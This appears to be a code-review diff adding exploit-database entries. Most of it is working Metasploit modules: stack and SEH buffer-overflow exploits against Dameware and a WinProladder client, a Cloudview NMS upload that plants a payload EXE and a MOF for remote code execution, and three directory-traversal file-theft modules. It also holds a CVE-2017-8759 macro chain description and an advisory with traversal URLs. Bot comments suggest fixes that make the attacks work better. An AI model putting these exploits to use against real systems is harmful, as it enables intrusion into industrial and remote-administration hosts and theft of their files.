[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# CC3250MT.dll
# pop ecx/ pop ebp/ retn
'Ret' => 0x32514d79
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2016'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "A" * 10000
pkt[1092, 4] = [0x04eb9090].pack('V') # jmp $+6
pkt[1096, 4] = [target.ret].pack('V')
pkt[1100, 50] = "\x90" * 50
pkt[1150, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end
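Review bot: the description should say the overflow is exploited through the SEH chain rather than a plain return-address overwrite: `pkt[1092, 4] = [0x04eb9090].pack('V') # jmp $+6` is the nSEH record (bytes 90 90 eb 04, with the short jump at 1094 landing at offset 1100 on the NOP sled) and the pop/pop/ret in CC3250MT.dll written at 1096 is the handler, which is exactly what makes this depend on that DLL not being SafeSEH-compiled on the target build. Separately, on_client_data fires on whatever first segment the client sends and responds unconditionally before closing the client; if the WinProladder request arrives in more than one segment the reply goes out before the request is complete, so consider inspecting the received data before answering.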

platforms/windows/remote/42703.rb Executable file

@ -0,0 +1,112 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability found
in Dameware Mini Remote Control v4.0. The overflow is caused when sending
an overly long username to the DWRCS executable listening on port 6129.
The username is read into a strcpy() function causing an overwrite of
the return pointer leading to arbitrary code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2005-2842' ],
[ 'BID', '14707' ],
[ 'URL', 'http://secunia.com/advisories/16655' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 140,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# msvcrt.dll
# push esp/ retn
'Ret' => 0x77c35459,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 01 2005'))
register_options(
[
Opt::RPORT(6129),
], self.class )
end
def pkt1
p = payload.encoded
boom = "\x43" * 259
boom[100, 4] = [target.ret].pack('V')
boom[108, p.length] = p
packet = "\x00" * 4056
packet[0, 4] = "\x30\x11\x00\x00"
packet[4, 4] = "\x00\x00\x00\x00"
packet[8, 4] = "\xd7\xa3\x70\x3d"
packet[12, 4] = "\x0a\xd7\x0d\x40"
packet[16, 20] = "\x00" * 20
packet[36, 4] = "\x01\x00\x00\x00"
packet[40, 4] = [0x00002710].pack('V')
packet[196, 259] = rand_text_alpha(259)
packet[456, 259] = boom
packet[716, 259] = rand_text_alpha(259)
packet[976, 259] = rand_text_alpha(259)
packet[1236, 259] = rand_text_alpha(259)
packet[1496, 259] = rand_text_alpha(259)
return packet
end
def pkt2
packet = "\x00" * 4096
packet[756, 259] = rand_text_alpha(259)
return packet
end
def exploit
connect
sock.put(pkt1)
sock.recv(1024)
sock.put(pkt2)
sock.recv(84)
handler
disconnect
end
end
__END__
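Review bot: `'DisclosureDate' => 'Sept 01 2005'` uses a four-letter month; Metasploit expects the 'Mon DD YYYY' form ('Sep 01 2005') and msftidy reports the line as an incorrect disclosure date format. `'Version' => '$Revision: $'` is a stale SVN keyword and the trailing `__END__` is unnecessary. In exploit, `sock.recv(1024)` and `sock.recv(84)` are called with no timeout, so a target that never answers the first packet (a patched DWRCS, or a filter that drops it) hangs the module instead of failing; use `sock.get_once(-1, timeout)` or otherwise bound the wait, and print a status line so the user can see which packet the exchange stalled on.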

platforms/windows/remote/42704.rb Executable file

@ -0,0 +1,127 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'Cloudview NMS File Upload',
'Description' => %q{
This module exploits a file upload vulnerability
found within Cloudview NMS < 2.00b. The vulnerability
is triggered by sending specialized packets to the
server with directory traversal sequences (..@ in
this case) to browse outside of the web root.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', '0day' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Cloudview NMS 2.00b on Windows', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 13 2014'))
register_options([
Opt::RPORT(80),
OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
], self.class )
end
def exploit
# setup
vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
exe = generate_payload_exe
vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
mof_name = rand_text_alpha(rand(10)+5) + '.vbs'
mof = generate_mof(mof_name, vbs_name)
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
print_status("Uploading #{vbs_name} to #{peer}...")
# logging in to get the "session"
@sess = rand(0..2048)
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
})
# This is needed to setup the upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1',
})
# Uploading VBS file
data = Rex::MIME::Message.new
data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{vbs_name} successfully!")
print_status("Uploading #{mof_name} to #{peer}...")
# Setting up upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1'
})
# Uploading MOF file
data = Rex::MIME::Message.new
data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{mof_name} successfully!")
else
print_error("Something went wrong...")
end
else
print_error("Something went wrong...")
end
end
end
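Review bot: `mof_name = rand_text_alpha(rand(10)+5) + '.vbs'` gives the MOF file a .vbs extension; the line for the VBS name two lines above is identical, so this looks like a copy-and-paste slip for '.mof', which is what the WbemExec mixin's generate_mof output is meant to be dropped into wbem\mof as. Also: `[ 'URL', '0day' ]` is not a usable reference and msftidy flags it (link an advisory or drop the entry); the description says 'Cloudview NMS < 2.00b' while the only target is 'Cloudview NMS 2.00b on Windows', so the affected range needs reconciling; and `res.body =~ /Uploaded file OK/` is evaluated without checking that `res` is non-nil, so an unreachable or silent host raises NoMethodError instead of reaching the print_error branch.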


@ -0,0 +1,17 @@
Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Running CVE-2017-8759 exploit sample.
Flow of the exploit:
Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
To test:
Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080
If all is good mspaint should run.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip
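Review bot: 'which triggers the WSDL parser log' reads as a typo for 'bug' (CVE-2017-8759 is the .NET SOAP WSDL parser code-injection flaw), and 'runs a powershell commands' should be singular. The test steps say to serve exploit.txt and cmd.hta on port 8080 but never say which host or URL the Doc1.doc sample fetches from, so a reader who hosts the files on a different address will see nothing happen and cannot tell a failed exploit from a mismatched URL; state the address the sample points at, or how to change it.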


@ -0,0 +1,59 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Indusoft Web Studio Directory Traversal',
'Description' => %q{
This module exploits a flaw found in Indusoft Web Studio
<= 7.1 before SP2 Patch 4. This specific flaw allows users
to browse outside of the webroot to download files found
on the underlying system
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2014-0780' ],
[ 'ZDI', '14-118/' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
],
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "/" + levels + datastore['FILE'],
})
if res and res.code == 200 and res.message =~ /Sending file/
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
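Review bot: `[ 'ZDI', '14-118/' ]` has a stray trailing slash, so the generated ZDI link is wrong, and `'Version' => '$Revision: $'` is a stale SVN keyword. In run, `DEPTH` is registered with a default of 8 but the fallback `(datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']` substitutes 10, so DEPTH=0 behaves differently from the documented default; pick one value. When the response is not a 200 whose status line contains 'Sending file' the module returns without printing anything, so the user cannot distinguish a patched host from a wrong DEPTH or FILE; report it. Finally, `'DisclosureDate' => 'Jan 18 2013'` predates the referenced CVE-2014-0780 and ICSA-14-107-02, both 2014 identifiers; check the date.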


@ -0,0 +1,67 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carlo Gavazzi Powersoft Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
is triggered when sending a specially crafted GET request to the
server. The location parameter of the GET request is not sanitized
and the sendCommand.php script will automatically pull down any
file requested
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
],
'DisclosureDate' => 'Jan 21 2015'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
Opt::RPORT(80)
], self.class )
end
def run
require 'base64'
credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}?res=&valid=true",
'headers' => {
'Authorization' => "Basic #{credentials}"
},
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
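Review bot: `Base64.encode64(...)` appends a newline (and inserts one every 60 characters), so the value placed in `'Authorization' => "Basic #{credentials}"` ends in "\n" and, for long credentials, contains embedded line breaks; depending on how the server parses headers that either corrupts the header or terminates the header block early. Use `Base64.strict_encode64` or `Rex::Text.encode_base64`, and move `require 'base64'` out of run to the top of the file. As with the other traversal modules in this commit, a non-200 response produces no output at all; print a status or error so the user can tell a fixed host from bad credentials or a bad path.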


@ -0,0 +1,57 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carel Pl@ntVisor Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
triggered by sending a specially crafted GET request to the
victim server.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3487' ],
[ 'BID', '49601' ],
],
'DisclosureDate' => 'Jun 29 2012'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("..%5c" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}",
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
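Review bot: `'DisclosureDate' => 'Jun 29 2012'` conflicts with the Luigi Auriemma advisory for this bug that follows in the same commit, which is dated 13 Sep 2011; that advisory (with CVE-2011-3487) is the primary source, so add its URL to 'References' and correct the date. The traversal string `"..%5c" * depth` only exercises the encoded-backslash variant, while the advisory shows that plain `../`, `..\` and `%2f` forms also work; a comment to that effect helps anyone adapting the module when one form is filtered. A non-200 response again returns silently and should be reported.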


@ -0,0 +1,76 @@
#######################################################################
Luigi Auriemma
Application: Carel PlantVisor
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions: <= 2.4.4
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."
#######################################################################
======
2) Bug
======
CarelDataServer.exe is a web server listening on port 80.
The software is affected by a directory traversal vulnerability that
allows to download the files located on the disk where it's installed.
Both slash and backslash and their HTTP encoded values are supported.
#######################################################################
===========
3) The Code
===========
http://SERVER/..\..\..\..\..\..\boot.ini
http://SERVER/../../../../../../boot.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
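Review bot: all four proof-of-concept URLs retrieve boot.ini, which exists only on Windows XP / Server 2003 and earlier; on Vista and later the file is absent, so a 404 there does not show the traversal is fixed. Test with a file present on every Windows version (for example windows\win.ini) before concluding a host is not affected. The same caveat applies to the Metasploit traversal modules in this commit whose FILE option defaults to boot.ini.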